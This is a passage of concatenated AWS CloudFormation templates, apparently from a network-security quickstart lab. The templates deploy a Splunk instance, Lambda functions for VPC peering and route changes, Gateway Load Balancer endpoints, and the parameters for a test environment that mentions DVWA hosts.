SplunkVersion: 23 | Description: Splunk Version 24 | Type: String 25 | NeedSSMAccess: 26 | Description: If enabled, SSM access to the instance will be available. 27 | Type: String 28 | AllowedValues: [true, false] 29 | c1nsStackName: 30 | Description: Stack Name of the c1ns security vpc template 31 | Type: String 32 | # ------------------------------------------------------------# 33 | # Import BaseVPC stack(aws-vpc.template.yaml file) 34 | # ------------------------------------------------------------# 35 | VPCID: 36 | Description: Enter the VPC ID where you want to deploy the Splunk 37 | Type: String 38 | VPCCIDR: 39 | Description: Enter the VPC CIDR where you want to deploy the Splunk 40 | Type: String 41 | # ------------------------------------------------------------# 42 | # Import BaseSite stack(BaseSite.yaml file) 43 | # ------------------------------------------------------------# 44 | InstanceProfile: 45 | Description: Instance profile to be used for SSM access 46 | Type: String 47 | # ------------------------------------------------------------# 48 | # Import ModifyRTTemplate stack(last.yaml file) 49 | # ------------------------------------------------------------# 50 | RTID: 51 | Description: Enter the Route Table ID where you want to deploy the Splunk 52 | Type: String 53 | PublicSubnet1ID: 54 | Description: Enter the Public Subnet ID where you want to deploy the Splunk 55 | Type: String 56 | 57 | # ------------------------------------------------------------# 58 | # Conditions 59 | # ------------------------------------------------------------# 60 | Conditions: 61 | NeedSSM: 62 | !Equals ["true", !Ref NeedSSMAccess] 63 | 64 | Resources: 65 | # ------------------------------------------------------------# 66 | # Create Lambda for VPC peering and modify route table 67 | # ------------------------------------------------------------# 68 | CreateVPCpeeringLambdaRole: 69 | Type: AWS::IAM::Role 70 | Properties: 71 | Path: / 72 | RoleName: 73 | Fn::Join: 74 | - "" 75 | - - Fn::Select: 76 | - 2 77 | - Fn::Split: 78 | - "-" 79 | - !Ref AWS::StackName 80 | - "-CreateVPCpeeringLambdaRole" 81 | AssumeRolePolicyDocument: 82 | Version: 2012-10-17 83 | Statement: 84 | - Effect: Allow 85 | Principal: 86 | Service: 87 | - lambda.amazonaws.com 88 | Action: 89 | - sts:AssumeRole 90 | MaxSessionDuration: 3600 91 | ManagedPolicyArns: 92 | - arn:aws:iam::aws:policy/service-role/AWSLambdaBasicExecutionRole 93 | - !Ref CreateVPCpeeringLambdaPolicy 94 | 95 | CreateVPCpeeringLambdaPolicy: 96 | Type: AWS::IAM::ManagedPolicy 97 | Properties: 98 | ManagedPolicyName: 99 | Fn::Join: 100 | - "" 101 | - - Fn::Select: 102 | - 2 103 | - Fn::Split: 104 | - "-" 105 | - !Ref AWS::StackName 106 | - "-CreateVPCpeeringLambdaPolicy" 107 | Path: / 108 | PolicyDocument: 109 | Version: 2012-10-17 110 | Statement: 111 | - Action: 112 | - ec2:DeleteTags 113 | - ec2:AcceptVpcPeeringConnection 114 | - ec2:DescribeVpcs 115 | - ec2:CreateRoute 116 | - ec2:DeleteVpcPeeringConnection 117 | - ec2:CreateTags 118 | - ec2:DescribeVpcPeeringConnections 119 | - ec2:DeleteRoute 120 | - ec2:CreateVpcPeeringConnection 121 | - ec2:DescribeRouteTables 122 | Resource: "*" 123 | Effect: Allow 124 | 125 | CreateVPCpeeringLambdaFunction: 126 | Type: AWS::Lambda::Function 127 | Properties: 128 | Code: 129 | ZipFile: | 130 | import json, boto3, logging 131 | import cfnresponse 132 | import os 133 | logger = logging.getLogger() 134 | logger.setLevel(logging.INFO) 135 | 136 | client = boto3.client('ec2') 137 | BaseVPC = os.getenv("VPCID") 138 | BaseVPCcidr = os.getenv("VPCCIDR") 139 | BaseRTId = os.getenv("RTID") 140 | StackName = os.getenv("STACKNAME") 141 | 142 | def lambda_handler(event, context): 143 | logger.info("event: {}".format(event)) 144 | status = cfnresponse.SUCCESS 145 | try: 146 | if event['RequestType'] == 'Create': 147 | response = client.describe_vpcs( 148 | Filters=[ 149 | { 150 | 'Name': 'tag:aws:cloudformation:stack-name', 151 | 'Values': [ 152 | StackName 153 | ] 154 | }, 155 | ], 156 | ) 157 | nsvaVPC = response["Vpcs"][0]["VpcId"] 158 | nsvaVPCcidr = response["Vpcs"][0]["CidrBlock"] 159 | request = client.create_vpc_peering_connection( 160 | PeerVpcId=nsvaVPC, 161 | VpcId=BaseVPC, 162 | TagSpecifications=[ 163 | { 164 | 'ResourceType': 'vpc-peering-connection', 165 | 'Tags': [ 166 | { 167 | 'Key': 'StackName', 168 | 'Value': StackName 169 | }, 170 | ] 171 | }, 172 | ] 173 | ) 174 | connectionId = request["VpcPeeringConnection"]["VpcPeeringConnectionId"] 175 | client.accept_vpc_peering_connection( 176 | VpcPeeringConnectionId=connectionId 177 | ) 178 | 179 | nsvaRT = client.describe_route_tables( 180 | Filters=[ 181 | { 182 | 'Name': 'tag:aws:cloudformation:stack-name', 183 | 'Values': [ 184 | StackName, 185 | ] 186 | }, 187 | ], 188 | ) 189 | for i in range(len(nsvaRT['RouteTables'])): 190 | # NSVA side 191 | nsvaRTId = nsvaRT['RouteTables'][i]['RouteTableId'] 192 | client.create_route( 193 | DestinationCidrBlock=BaseVPCcidr, 194 | RouteTableId=nsvaRTId, 195 | VpcPeeringConnectionId=connectionId 196 | ) 197 | # Base side 198 | client.create_route( 199 | DestinationCidrBlock=nsvaVPCcidr, 200 | RouteTableId=BaseRTId, 201 | VpcPeeringConnectionId=connectionId 202 | ) 203 | 204 | if event['RequestType'] == 'Delete': 205 | peerconnectionId = client.describe_vpc_peering_connections( 206 | Filters=[ 207 | { 208 | 'Name': 'tag:StackName', 209 | 'Values': [ 210 | StackName, 211 | ] 212 | }, 213 | ], 214 | ) 215 | delVpcPeeringConnectionId = peerconnectionId['VpcPeeringConnections'][0]['VpcPeeringConnectionId'] 216 | 217 | client.delete_vpc_peering_connection( 218 | VpcPeeringConnectionId=delVpcPeeringConnectionId 219 | ) 220 | 221 | response = client.describe_vpcs( 222 | Filters=[ 223 | { 224 | 'Name': 'tag:aws:cloudformation:stack-name', 225 | 'Values': [ 226 | StackName 227 | ] 228 | }, 229 | ], 230 | ) 231 | nsvaVPCcidr = response["Vpcs"][0]["CidrBlock"] 232 | 233 | nsvaRT = client.describe_route_tables( 234 | Filters=[ 235 | { 236 | 'Name': 'tag:aws:cloudformation:stack-name', 237 | 'Values': [ 238 | StackName, 239 | ] 240 | }, 241 | ], 242 | ) 243 | for i in range(len(nsvaRT['RouteTables'])): 244 | # NSVA side 245 | nsvaRTId = nsvaRT['RouteTables'][i]['RouteTableId'] 246 | client.delete_route( 247 | DestinationCidrBlock=BaseVPCcidr, 248 | RouteTableId=nsvaRTId, 249 | ) 250 | # Base side 251 | client.delete_route( 252 | DestinationCidrBlock=nsvaVPCcidr, 253 | RouteTableId=BaseRTId, 254 | ) 255 | 256 | except Exception: 257 | logger.error('Unhandled exception', exc_info=True) 258 | status = cfnresponse.FAILED 259 | finally: 260 | cfnresponse.send(event, context, status, {}, None) 261 | Role: !GetAtt CreateVPCpeeringLambdaRole.Arn 262 | Environment: 263 | Variables: 264 | VPCID: !Ref VPCID 265 | VPCCIDR: !Ref VPCCIDR 266 | RTID: !Ref RTID 267 | STACKNAME: !Ref c1nsStackName 268 | FunctionName: 269 | Fn::Join: 270 | - "" 271 | - - Fn::Select: 272 | - 2 273 | - Fn::Split: 274 | - "-" 275 | - !Ref AWS::StackName 276 | - "-CreateVPCpeering-Function" 277 | Handler: index.lambda_handler 278 | MemorySize: 128 279 | Runtime: python3.7 280 | Timeout: 300 281 | 282 | CreateVPCpeering: 283 | Type: AWS::CloudFormation::CustomResource 284 | Properties: 285 | ServiceToken: !GetAtt CreateVPCpeeringLambdaFunction.Arn 286 | 287 | # ------------------------------------------------------------# 288 | # Create Splunk Instance 289 | # ------------------------------------------------------------# 290 | SplunkSecurityGroup: 291 | Type: AWS::EC2::SecurityGroup 292 | Properties: 293 | GroupDescription: Security Group 294 | VpcId: !Ref VPCID 295 | SecurityGroupIngress: 296 | - IpProtocol: tcp 297 | FromPort: 8000 298 | ToPort: 8000 299 | CidrIp: !Ref AllowIP 300 | - IpProtocol: tcp 301 | FromPort: !Ref SyslogPort 302 | ToPort: !Ref SyslogPort 303 | CidrIp: !Ref SecurityVPCCIDR 304 | Splunk: 305 | Type: AWS::EC2::Instance 306 | Properties: 307 | IamInstanceProfile: !If 308 | - NeedSSM 309 | - !Ref InstanceProfile 310 | - !Ref AWS::NoValue 311 | ImageId: !Ref ImageId 312 | InstanceType: m5.large 313 | BlockDeviceMappings: 314 | - DeviceName: /dev/xvda 315 | Ebs: 316 | VolumeSize: 40 317 | VolumeType: gp3 318 | NetworkInterfaces: 319 | - AssociatePublicIpAddress: true 320 | DeviceIndex: 0 321 | GroupSet: 322 | - Ref: SplunkSecurityGroup 323 | SubnetId: 324 | Ref: PublicSubnet1ID 325 | Tags: 326 | - Key: Name 327 | Value: Splunk 328 | UserData: 329 | Fn::Base64: !Sub | 330 | #!/bin/bash -x 331 | yum update -y 332 | yum install -y docker 333 | systemctl enable docker 334 | service docker start 335 | docker pull splunk/splunk:${SplunkVersion} 336 | docker run -d -p 8000:8000 -p ${SyslogPort}:${SyslogPort}/tcp -e "SPLUNK_START_ARGS=--accept-license" -e "SPLUNK_PASSWORD=${SplunkPassword}" --name splunk splunk/splunk:${SplunkVersion} 337 | 338 | Outputs: 339 | SplunkURL: 340 | Value: !Sub http://${Splunk.PublicDnsName}:8000 341 | Description: Splunk URL 342 | SplunkInternalIP: 343 | Value: !GetAtt Splunk.PrivateIp 344 | Description: Splunk private IP address -------------------------------------------------------------------------------- /centralized-with-gwlb/templates/last.yaml: -------------------------------------------------------------------------------- 1 | AWSTemplateFormatVersion: 2010-09-09 2 | 3 | Parameters: 4 | # ------------------------------------------------------------# 5 | # Import Master.yaml template 6 | # ------------------------------------------------------------# 7 | AvailabilityZones: 8 | Description: 'List of Availability Zones to use for the subnets in the VPC. Select the AZ to deploy GWLB Endpoint. Note: 9 | The logical order is preserved.' 10 | Type: List 11 | PublicSubnet1CIDR: 12 | Description: Enter the Public Subnet CIDR to deploy the GWLBE, CIDR block for the public DMZ subnet 1 located in Availability Zone 13 | 1 14 | Type: String 15 | AllowedPattern: ^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(\/(1[6-9]|2[0-8]))$ 16 | ConstraintDescription: CIDR block parameter must be in the form x.x.x.x/16-28 17 | Default: 10.0.201.0/24 18 | PublicSubnet2CIDR: 19 | Description: Enter the Public Subnet CIDR to deploy the GWLBE, CIDR block for the public DMZ subnet 2 located in Availability Zone 20 | 2 21 | Type: String 22 | AllowedPattern: ^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])(\/(1[6-9]|2[0-8]))$ 23 | ConstraintDescription: CIDR block parameter must be in the form x.x.x.x/16-28 24 | Default: 10.0.202.0/24 25 | PublicSubnetTag1: 26 | Description: tag to add to public subnets, in format Key=Value (Optional) 27 | Type: String 28 | AllowedPattern: ^([a-zA-Z0-9+\-._:/@]+=[a-zA-Z0-9+\-.,_:/@ *\\"'\[\]\{\}]*)?$ 29 | ConstraintDescription: tags must be in format "Key=Value" keys can only contain 30 | [a-zA-Z0-9+\-._:/@], values can contain [a-zA-Z0-9+\-._:/@ *\\"'\[\]\{\}] 31 | Default: Network=Public 32 | PublicSubnetTag2: 33 | Description: tag to add to public subnets, in format Key=Value (Optional) 34 | Type: String 35 | AllowedPattern: ^([a-zA-Z0-9+\-._:/@]+=[a-zA-Z0-9+\-.,_:/@ *\\"'\[\]\{\}]*)?$ 36 | ConstraintDescription: tags must be in format "Key=Value" keys can only contain 37 | [a-zA-Z0-9+\-._:/@], values can contain [a-zA-Z0-9+\-._:/@ *\\"'\[\]\{\}] 38 | Default: '' 39 | PublicSubnetTag3: 40 | Description: tag to add to public subnets, in format Key=Value (Optional) 41 | Type: String 42 | AllowedPattern: ^([a-zA-Z0-9+\-._:/@]+=[a-zA-Z0-9+\-.,_:/@ *\\"'\[\]\{\}]*)?$ 43 | ConstraintDescription: tags must be in format "Key=Value" keys can only contain 44 | [a-zA-Z0-9+\-._:/@], values can contain [a-zA-Z0-9+\-._:/@ *\\"'\[\]\{\}] 45 | Default: '' 46 | # ------------------------------------------------------------# 47 | # Import BaseVPC stack(aws-vpc.template.yaml file) 48 | # ------------------------------------------------------------# 49 | VPC: 50 | Description: Enter the VPC ID where you want to deploy the GWLB Endpoint 51 | Type: String 52 | InternetGateway: 53 | Description: IGW ID of the VPC where the GWLBE is deployed 54 | Type: String 55 | BasePublicSubnet1CIDR: 56 | Description: Enter the Public Subnet CIDR that was originally deployed 57 | Type: String 58 | BasePublicSubnet2CIDR: 59 | Description: Enter the Public Subnet CIDR that was originally deployed 60 | Type: String 61 | BasePublicSubnet1RouteTable: 62 | Description: Enter the Public Subnet Route Table ID that was originally deployed 63 | Type: String 64 | BasePublicSubnet2RouteTable: 65 | Description: Enter the Public Subnet Route Table ID that was originally deployed 66 | Type: String 67 | # ------------------------------------------------------------# 68 | # Import c1nsSecurityVPCTemplate stack(security_vpc.yml file) 69 | # ------------------------------------------------------------# 70 | VPCEndpointServiceName: 71 | Description: VPC Endpoint Service Name 72 | Type: String 73 | 74 | # ------------------------------------------------------------# 75 | # Conditions 76 | # ------------------------------------------------------------# 77 | Conditions: 78 | PublicSubnetTag1Condition: !Not 79 | - !Equals 80 | - !Ref 'PublicSubnetTag1' 81 | - '' 82 | PublicSubnetTag2Condition: !Not 83 | - !Equals 84 | - !Ref 'PublicSubnetTag2' 85 | - '' 86 | PublicSubnetTag3Condition: !Not 87 | - !Equals 88 | - !Ref 'PublicSubnetTag3' 89 | - '' 90 | 91 | Resources: 92 | # ------------------------------------------------------------# 93 | # Create Public Subnet for GWLB Endpoint 94 | # ------------------------------------------------------------# 95 | PublicSubnet1: 96 | Type: AWS::EC2::Subnet 97 | Properties: 98 | VpcId: !Ref VPC 99 | CidrBlock: !Ref PublicSubnet1CIDR 100 | AvailabilityZone: !Select 101 | - 0 102 | - !Ref AvailabilityZones 103 | Tags: 104 | - Key: Name 105 | Value: Public subnet 1 106 | - !If 107 | - PublicSubnetTag1Condition 108 | - Key: !Select 109 | - 0 110 | - !Split 111 | - '=' 112 | - !Ref PublicSubnetTag1 113 | Value: !Select 114 | - 1 115 | - !Split 116 | - '=' 117 | - !Ref PublicSubnetTag1 118 | - !Ref AWS::NoValue 119 | - !If 120 | - PublicSubnetTag2Condition 121 | - Key: !Select 122 | - 0 123 | - !Split 124 | - '=' 125 | - !Ref PublicSubnetTag2 126 | Value: !Select 127 | - 1 128 | - !Split 129 | - '=' 130 | - !Ref PublicSubnetTag2 131 | - !Ref AWS::NoValue 132 | - !If 133 | - PublicSubnetTag3Condition 134 | - Key: !Select 135 | - 0 136 | - !Split 137 | - '=' 138 | - !Ref PublicSubnetTag3 139 | Value: !Select 140 | - 1 141 | - !Split 142 | - '=' 143 | - !Ref PublicSubnetTag3 144 | - !Ref AWS::NoValue 145 | MapPublicIpOnLaunch: true 146 | PublicSubnet2: 147 | Type: AWS::EC2::Subnet 148 | Properties: 149 | VpcId: !Ref VPC 150 | CidrBlock: !Ref PublicSubnet2CIDR 151 | AvailabilityZone: !Select 152 | - 1 153 | - !Ref AvailabilityZones 154 | Tags: 155 | - Key: Name 156 | Value: Public subnet 2 157 | - !If 158 | - PublicSubnetTag1Condition 159 | - Key: !Select 160 | - 0 161 | - !Split 162 | - '=' 163 | - !Ref PublicSubnetTag1 164 | Value: !Select 165 | - 1 166 | - !Split 167 | - '=' 168 | - !Ref PublicSubnetTag1 169 | - !Ref AWS::NoValue 170 | - !If 171 | - PublicSubnetTag2Condition 172 | - Key: !Select 173 | - 0 174 | - !Split 175 | - '=' 176 | - !Ref PublicSubnetTag2 177 | Value: !Select 178 | - 1 179 | - !Split 180 | - '=' 181 | - !Ref PublicSubnetTag2 182 | - !Ref AWS::NoValue 183 | - !If 184 | - PublicSubnetTag3Condition 185 | - Key: !Select 186 | - 0 187 | - !Split 188 | - '=' 189 | - !Ref PublicSubnetTag3 190 | Value: !Select 191 | - 1 192 | - !Split 193 | - '=' 194 | - !Ref PublicSubnetTag3 195 | - !Ref AWS::NoValue 196 | MapPublicIpOnLaunch: true 197 | 198 | # ------------------------------------------------------------# 199 | # Create Route table to attach to the Public Subnet for GWLB Endpoint 200 | # ------------------------------------------------------------# 201 | PublicSubnet1RouteTable: 202 | Type: AWS::EC2::RouteTable 203 | Properties: 204 | VpcId: !Ref VPC 205 | Tags: 206 | - Key: Name 207 | Value: ForPublicSubnet1RouteTable 208 | PublicSubnet1Route: 209 | Type: AWS::EC2::Route 210 | Properties: 211 | RouteTableId: !Ref PublicSubnet1RouteTable 212 | DestinationCidrBlock: 0.0.0.0/0 213 | GatewayId: !Ref InternetGateway 214 | PublicSubnet1RouteTableAssociation: 215 | Type: AWS::EC2::SubnetRouteTableAssociation 216 | Properties: 217 | SubnetId: !Ref PublicSubnet1 218 | RouteTableId: !Ref PublicSubnet1RouteTable 219 | 220 | PublicSubnet2RouteTable: 221 | Type: AWS::EC2::RouteTable 222 | Properties: 223 | VpcId: !Ref VPC 224 | Tags: 225 | - Key: Name 226 | Value: ForPublicSubnet2RouteTable 227 | PublicSubnet2Route: 228 | Type: AWS::EC2::Route 229 | Properties: 230 | RouteTableId: !Ref PublicSubnet2RouteTable 231 | DestinationCidrBlock: 0.0.0.0/0 232 | GatewayId: !Ref InternetGateway 233 | PublicSubnet2RouteTableAssociation: 234 | Type: AWS::EC2::SubnetRouteTableAssociation 235 | Properties: 236 | SubnetId: !Ref PublicSubnet2 237 | RouteTableId: !Ref PublicSubnet2RouteTable 238 | 239 | # ------------------------------------------------------------# 240 | # Create GWLB Endpoint 241 | # ------------------------------------------------------------# 242 | GWLBEndopoint1: 243 | Type: AWS::EC2::VPCEndpoint 244 | Properties: 245 | ServiceName: !Ref VPCEndpointServiceName 246 | SubnetIds: 247 | - !Ref PublicSubnet1 248 | VpcEndpointType: GatewayLoadBalancer 249 | VpcId: !Ref VPC 250 | 251 | GWLBEndopoint2: 252 | Type: AWS::EC2::VPCEndpoint 253 | Properties: 254 | ServiceName: !Ref VPCEndpointServiceName 255 | SubnetIds: 256 | - !Ref PublicSubnet2 257 | VpcEndpointType: GatewayLoadBalancer 258 | VpcId: !Ref VPC 259 | 260 | # ------------------------------------------------------------# 261 | # Create VPC Ingress Routing 262 | # ------------------------------------------------------------# 263 | VIRRouteTable: 264 | Type: AWS::EC2::RouteTable 265 | Properties: 266 | VpcId: !Ref VPC 267 | Tags: 268 | - Key: Name 269 | Value: ForVIRRouteTable 270 | VIR1Route: 271 | Type: AWS::EC2::Route 272 | Properties: 273 | RouteTableId: !Ref VIRRouteTable 274 | DestinationCidrBlock: !Ref BasePublicSubnet1CIDR 275 | VpcEndpointId: !Ref GWLBEndopoint1 276 | 277 | VIR2Route: 278 | Type: AWS::EC2::Route 279 | Properties: 280 | RouteTableId: !Ref VIRRouteTable 281 | DestinationCidrBlock: !Ref BasePublicSubnet2CIDR 282 | VpcEndpointId: !Ref GWLBEndopoint2 283 | 284 | VIR: 285 | Type: AWS::EC2::GatewayRouteTableAssociation 286 | Properties: 287 | GatewayId: !Ref InternetGateway 288 | RouteTableId: !Ref VIRRouteTable 289 | 290 | # ------------------------------------------------------------# 291 | # Create Lambda for modify base route table 292 | # ------------------------------------------------------------# 293 | ModifyRouteTableLambdaRole: 294 | Type: AWS::IAM::Role 295 | Properties: 296 | Path: "/" 297 | RoleName: 298 | Fn::Join: 299 | - "" 300 | - - Fn::Select: 301 | - 2 302 | - Fn::Split: 303 | - "-" 304 | - !Ref AWS::StackName 305 | - "-ModifyRouteTableLambdaRole" 306 | AssumeRolePolicyDocument: 307 | Version: 2012-10-17 308 | Statement: 309 | - Effect: Allow 310 | Principal: 311 | Service: 312 | - lambda.amazonaws.com 313 | Action: 314 | - sts:AssumeRole 315 | MaxSessionDuration: 3600 316 | ManagedPolicyArns: 317 | - arn:aws:iam::aws:policy/service-role/AWSLambdaBasicExecutionRole 318 | - !Ref ModifyRouteTableLambdaPolicy 319 | 320 | ModifyRouteTableLambdaPolicy: 321 | Type: "AWS::IAM::ManagedPolicy" 322 | Properties: 323 | ManagedPolicyName: 324 | Fn::Join: 325 | - "" 326 | - - Fn::Select: 327 | - 2 328 | - Fn::Split: 329 | - "-" 330 | - !Ref AWS::StackName 331 | - "-ModifyRouteTableLambdaPolicy" 332 | Path: / 333 | PolicyDocument: 334 | Version: 2012-10-17 335 | Statement: 336 | - Action: 337 | - ec2:ReplaceRoute 338 | Resource: "*" 339 | Effect: Allow 340 | 341 | ModifyRouteTableLambdaFunction: 342 | Type: AWS::Lambda::Function 343 | Properties: 344 | Code: 345 | ZipFile: | 346 | import json, boto3, logging 347 | import cfnresponse 348 | import os 349 | logger = logging.getLogger() 350 | logger.setLevel(logging.INFO) 351 | 352 | destination_cidr_block = "0.0.0.0/0" 353 | 354 | igw = os.getenv('IGW') 355 | route_table_id1 = os.getenv('RT1') 356 | VpcEndpointId1 = os.getenv('GWLBE1') 357 | route_table_id2 = os.getenv('RT2') 358 | VpcEndpointId2 = os.getenv('GWLBE2') 359 | ec2 = boto3.resource('ec2') 360 | route1 = ec2.Route(route_table_id1,destination_cidr_block) 361 | route2 = ec2.Route(route_table_id2,destination_cidr_block) 362 | 363 | def lambda_handler(event, context): 364 | logger.info("event: {}".format(event)) 365 | status = cfnresponse.SUCCESS 366 | try: 367 | if event['RequestType'] == 'Create': 368 | route1.replace( 369 | VpcEndpointId=VpcEndpointId1 370 | ) 371 | route2.replace( 372 | VpcEndpointId=VpcEndpointId2 373 | ) 374 | if event['RequestType'] == 'Delete': 375 | route1.replace( 376 | GatewayId=igw 377 | ) 378 | route2.replace( 379 | GatewayId=igw 380 | ) 381 | except Exception: 382 | logger.error('Unhandled exception', exc_info=True) 383 | status = cfnresponse.FAILED 384 | finally: 385 | cfnresponse.send(event, context, status, {}, None) 386 | Role: !GetAtt ModifyRouteTableLambdaRole.Arn 387 | Environment: 388 | Variables: 389 | IGW: !Ref InternetGateway 390 | RT1: !Ref BasePublicSubnet1RouteTable 391 | GWLBE1: !Ref GWLBEndopoint1 392 | RT2: !Ref BasePublicSubnet2RouteTable 393 | GWLBE2: !Ref GWLBEndopoint2 394 | FunctionName: 395 | Fn::Join: 396 | - "" 397 | - - Fn::Select: 398 | - 2 399 | - Fn::Split: 400 | - "-" 401 | - !Ref AWS::StackName 402 | - "-ModifyRouteTable-Function" 403 | Handler: index.lambda_handler 404 | MemorySize: 128 405 | Runtime: python3.7 406 | Timeout: 300 407 | 408 | ModifyRouteTable: 409 | Type: AWS::CloudFormation::CustomResource 410 | Properties: 411 | ServiceToken: !GetAtt ModifyRouteTableLambdaFunction.Arn 412 | 413 | Outputs: 414 | PublicSubnet1Route: 415 | Description: ID of Public Subnet 1 Route Table 416 | Value: !Ref PublicSubnet1RouteTable 417 | PublicSubnet1ID: 418 | Description: ID of Public Subnet 1 419 | Value: !Ref PublicSubnet1 -------------------------------------------------------------------------------- /east-west-deployment/templates/Master.yaml: -------------------------------------------------------------------------------- 1 | AWSTemplateFormatVersion: 2010-09-09 2 | 3 | Mappings: 4 | RegionMap: 5 | ap-northeast-1: 6 | ImageId: "ami-05f01a6a414be9808" 7 | HostedId: "Z1YSHQZHG15GKL" 8 | ap-northeast-2: 9 | ImageId: "ami-06835923fab139b98" 10 | HostedId: "Z20JF4UZKIW1U8" 11 | ap-northeast-3: 12 | ImageId: "ami-081eaee471c0e1518" 13 | HostedId: "Z5LXEXXYW11ES" 14 | us-east-2: 15 | ImageId: "ami-0233c2d874b811deb" 16 | HostedId: "ZOJJZC49E0EPZ" 17 | us-east-1: 18 | ImageId: "ami-0dc2d3e4c0f9ebd18" 19 | HostedId: "Z1UJRXOUMOOFQ8" 20 | us-west-1: 21 | ImageId: "ami-0ed05376b59b90e46" 22 | HostedId: "Z2MUQ32089INYE" 23 | us-west-2: 24 | ImageId: "ami-0dc8f589abe99f538" 25 | HostedId: "Z2OJLYMUO9EFXC" 26 | ap-south-1: 27 | ImageId: "ami-00bf4ae5a7909786c" 28 | HostedId: "Z3VO1THU9YC4UR" 29 | ap-southeast-1: 30 | ImageId: "ami-0e5182fad1edfaa68" 31 | HostedId: "ZL327KTPIQFUL" 32 | ap-southeast-2: 33 | ImageId: "ami-0c9fe0dec6325a30c" 34 | HostedId: "Z2RPCDW04V8134" 35 | ca-central-1: 36 | ImageId: "ami-0db72f413fc1ddb2a" 37 | HostedId: "Z19DQILCV0OWEC" 38 | eu-central-1: 39 | ImageId: "ami-00f22f6155d6d92c5" 40 | HostedId: "Z1U9ULNL0V5AJ3" 41 | eu-west-1: 42 | ImageId: "ami-058b1b7fe545997ae" 43 | HostedId: "ZLY8HYME6SFDD" 44 | eu-west-2: 45 | ImageId: "ami-03ac5a9b225e99b02" 46 | HostedId: "ZJ5UAJN8Y3Z2Q" 47 | eu-west-3: 48 | ImageId: "ami-062fdd189639d3e93" 49 | HostedId: "Z3KY65QIEKYHQQ" 50 | eu-north-1: 51 | ImageId: "ami-00517306b63c4628c" 52 | HostedId: "Z3UWIKFBOOGXPP" 53 | sa-east-1: 54 | ImageId: "ami-0f8243a5175208e08" 55 | HostedId: "ZCMLWB8V5SYIT" 56 | # ap-east-1: 57 | # HostedId: "Z3FD1VL90ND7K5" 58 | # me-south-1: 59 | # HostedId: "Z20ZBPC0SS8806" 60 | 61 | NSVAAMIRegionMap: 62 | # IPS_AMI--2021.7.0.11129 63 | us-east-1: 64 | ImageId: ami-0c55b11b8c1850074 65 | us-east-2: 66 | ImageId: ami-049ac6c43ccc0eb59 67 | us-west-1: 68 | ImageId: ami-0c61fb7ad31615bc9 69 | us-west-2: 70 | ImageId: ami-0abee844f98a90719 71 | af-south1: 72 | ImageId: ami-07beb2f931b25bac4 73 | ap-east-1: 74 | ImageId: ami-0eef4c54b43719b15 75 | ap-south-1: 76 | ImageId: ami-0bb4faee68f7cbd25 77 | ap-northeast-2: 78 | ImageId: ami-06835923fab139b98 79 | ap-northeast-1: 80 | ImageId: ami-05f01a6a414be9808 81 | ap-southeast-1: 82 | ImageId: ami-08c9d7bc95ea77e79 83 | ap-southeast-2: 84 | ImageId: ami-095df8b8ec0e0aac5 85 | ca-central-1: 86 | ImageId: ami-0c1c1a2c0b54eea1e 87 | eu-north-1: 88 | ImageId: ami-0c3ba132507949f56 89 | eu-west-3: 90 | ImageId: ami-02c47030c3e886b4f 91 | eu-west-2: 92 | ImageId: ami-062e147780edfffc4 93 | eu-west-1: 94 | ImageId: ami-0c0a077459b3222d9 95 | eu-central-1: 96 | ImageId: ami-039d4a40e711415db 97 | eu-south-1: 98 | ImageId: ami-001fe5ed24c292c15 99 | me-south-1: 100 | ImageId: ami-036c40a2988da6da7 101 | sa-east-1: 102 | ImageId: ami-0edc19454ec876784 103 | 104 | Metadata: 105 | AWS::CloudFormation::Interface: 106 | ParameterGroups: 107 | - 108 | Label: 109 | default: Required parameters 110 | Parameters: 111 | - AllowIP 112 | - BucketName 113 | - BucketPrefix 114 | - BucketRegion 115 | - DVWAInstanceType 116 | - sshKeyPairName 117 | - SSMAccess 118 | - DeployC1NS 119 | - 120 | Label: 121 | default: If you set the DeployC1NS parameter to true, the following parameters are required 122 | Parameters: 123 | - CloudOneAPIKEY 124 | - InstanceType 125 | - SecurityVPCCIDR 126 | - NsvaCountPerAz 127 | - EnableInspectionLogs 128 | 129 | Parameters: 130 | # ------------------------------------------------------------# 131 | # Required parameters 132 | # ------------------------------------------------------------# 133 | AllowIP: 134 | Description: Enter the global IP of the terminal to be tested 135 | Type: String 136 | AllowedPattern: "(\\d{1,3})\\.(\\d{1,3})\\.(\\d{1,3})\\.(\\d{1,3})/(\\d{1,2})" 137 | ConstraintDescription: "Must be a valid IP range of the form x.x.x.x/x" 138 | Default: '127.0.0.1/32' 139 | BucketName: 140 | Description: Name of the bucket where the template is placed 141 | Type: String 142 | Default: 'quickstart-network-security' 143 | BucketPrefix: 144 | Description: Bucket prefix 145 | Type: String 146 | Default: 'east-west-deployment/' 147 | BucketRegion: 148 | Description: Bucket region 149 | Type: String 150 | Default: 'us-west-1' 151 | DVWAInstanceType: 152 | AllowedValues: 153 | - t2.nano 154 | - t2.micro 155 | - t2.small 156 | - t2.medium 157 | - t2.large 158 | - t3.micro 159 | - t3.small 160 | - t3.medium 161 | - t3.large 162 | - t3.xlarge 163 | - t3.2xlarge 164 | - m3.large 165 | - m3.xlarge 166 | - m3.2xlarge 167 | - m4.large 168 | - m4.xlarge 169 | - m4.2xlarge 170 | - m4.4xlarge 171 | Default: t3.micro 172 | Description: "Amazon EC2 instance type for the DVWA instances. Damn Vulnerable Web 173 | Application (DVWA) hosts are machines placed in the public subnet which are PHP/MySQL Web App and are vulnerable. 174 | This allows security professionals to test Network Security in a legal 175 | environment. For more information visit: https://dvwa.co.uk/" 176 | Type: String 177 | sshKeyPairName: 178 | Description: SSH Key of the EC2 you are using 179 | Type: AWS::EC2::KeyPair::KeyName 180 | ConstraintDescription: Must be the name of an existing EC2 KeyPair 181 | SSMAccess: 182 | Description: If enabled, SSM access to the instance will be available. 183 | Type: String 184 | AllowedValues: [true, false] 185 | Default: true 186 | DeployC1NS: 187 | Description: If enabled, C1NS with be deployed in centralized Security VPC 188 | Type: String 189 | AllowedValues: [true, false] 190 | Default: true 191 | # ------------------------------------------------------------# 192 | # If you set the DeployC1NS parameter to true, the following parameters are required 193 | # ------------------------------------------------------------# 194 | CloudOneAPIKEY: 195 | Description: Trend Micro Cloud One API key you want to use. 196 | Type: String 197 | NoEcho: true 198 | InstanceType: 199 | Description: Instance type of NSVA 200 | Type: String 201 | 